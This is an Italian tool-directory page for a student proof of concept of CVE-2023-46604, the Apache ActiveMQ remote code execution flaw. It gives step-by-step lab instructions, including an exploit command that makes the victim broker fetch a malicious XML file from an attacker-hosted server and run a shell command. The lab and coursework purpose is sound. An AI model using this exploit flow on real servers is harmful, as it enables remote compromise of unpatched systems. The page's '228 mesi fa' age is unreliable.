Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
SSP-Assignment-3-RCEYouLater — Un PoC per CVE-2023-46604 scritto come parte del corso SPS per il master in Advanced Cyber Security presso UPB. | Kitploit
Strumenti/GitHubGitHub/rockydesigne/ssp-assignment-3-rceyoulater
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebApprendimento e FormazioneLab e Pratica
GitHubrockydesigne/ssp-assignment-3-rceyoulater

SSP-Assignment-3-RCEYouLater

Un PoC per CVE-2023-46604 scritto come parte del corso SPS per il master in Advanced Cyber Security presso UPB.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
228 mesi faNon ancora revisionato
Condividi

CVE-2023-46604: Apache ActiveMQ Prova di Concetto di RCE

Compito: SSP Assignment 3 Squadra: RCE You Later Membri: Banica Horia Alexandru, Comarlau Vlad-Constantin

Link video dell'utilizzo del repository per fare la PoC: https://www.youtube.com/watch?v=vum4qTF4ygU

🚨 Panoramica

Questo repository contiene una Prova di Concetto (PoC) completamente funzionante per CVE-2023-46604. Questa vulnerabilità consente a un attaccante di eseguire comandi shell arbitrari su un server Apache ActiveMQ vulnerabile (versione 5.15.10) forzandolo a deserializzare un file di configurazione XML dannoso.

Obiettivo: Creare un file denominato pwned_by_ssp_team all'interno del server vittima per dimostrare il controllo.


🛠️ Prerequisiti

Prima di eseguire l'exploit, assicurati di avere:

  1. Docker e Docker Compose (Installati e in esecuzione)
  2. Python 3

📂 Struttura del Repository

  • vulnerable-env/: Contiene la configurazione Docker per il server vittima.
  • attacker/: Contiene gli script di exploit e i payload dannosi.
    • exploit.py: Lo script Python che invia il pacchetto dannoso.
    • serve.py: Un semplice server HTTP per ospitare il payload XML.
    • poc.xml: Il file di configurazione dannoso che contiene il comando touch /tmp/pwned_by_ssp_team.

  • 🚀 Guida all'Uso Passo-Passo

    Passo 1: Avvia la Vittima (ActiveMQ)

    Eseguiremo una versione vecchia e vulnerabile di ActiveMQ usando Docker.

    1. Apri un terminale.
    2. Naviga nella cartella vulnerable-env:
      root@kitploit:~
      cd vulnerable-env
      
    3. Avvia il container:
      root@kitploit:~
      docker-compose up -d
      
    4. Attendi 30 secondi per l'avvio completo del server.

    Passo 2: Ospita l'XML Dannoso

    Il server vittima deve scaricare le istruzioni da noi. Imposteremo un piccolo server web per ospitare queste istruzioni.

    1. Apri un secondo terminale.
    2. Naviga nella cartella attacker:
      root@kitploit:~
      cd attacker
      
    3. Avvia il server web Python:
      root@kitploit:~
      python3 serve.py
      
      Tieni questo terminale aperto! Dovresti vedere 'Serving HTTP on 0.0.0.0 port 8000...'

    Passo 3: Lancia l'Exploit

    Ora inviamo il pacchetto di rete specifico che innesca la vulnerabilità.

    1. Apri un terzo terminale.

    2. Naviga nella cartella attacker:

      root@kitploit:~
      cd attacker
      
    3. Esegui lo script di exploit.

      • Nota: Se sei su macOS o Windows, usa il comando seguente esattamente come scritto.
      root@kitploit:~
      python3 exploit.py -i 127.0.0.1 -p 61616 -u http://host.docker.internal:8000/poc.xml
      
      • Utenti Linux: Se sei su Linux, sostituisci host.docker.internal con il gateway del bridge di rete, solitamente: 172.17.0.1. Prova a ottenere l'indirizzo in questo modo se il prescritto non funziona: docker network inspect bridge -f '{{range .IPAM.Config}}{{.Gateway}}{{end}}'

    Passo 4: Verifica l'Hack

    Ha funzionato? Controlliamo se il file è stato creato all'interno del container.

    1. Torna al tuo primo terminale (o a qualsiasi terminale).
    2. Esegui questo comando per controllare la cartella /tmp all'interno della vittima:
      root@kitploit:~
      docker exec activemq-victim ls -l /tmp
      
    3. Successo: Dovresti vedere un file chiamato pwned_by_ssp_team.

    🧹 Pulizia

    Per fermare e rimuovere il container vulnerabile:

    root@kitploit:~
    cd vulnerable-env
    docker-compose down
    
    Scarica lo strumento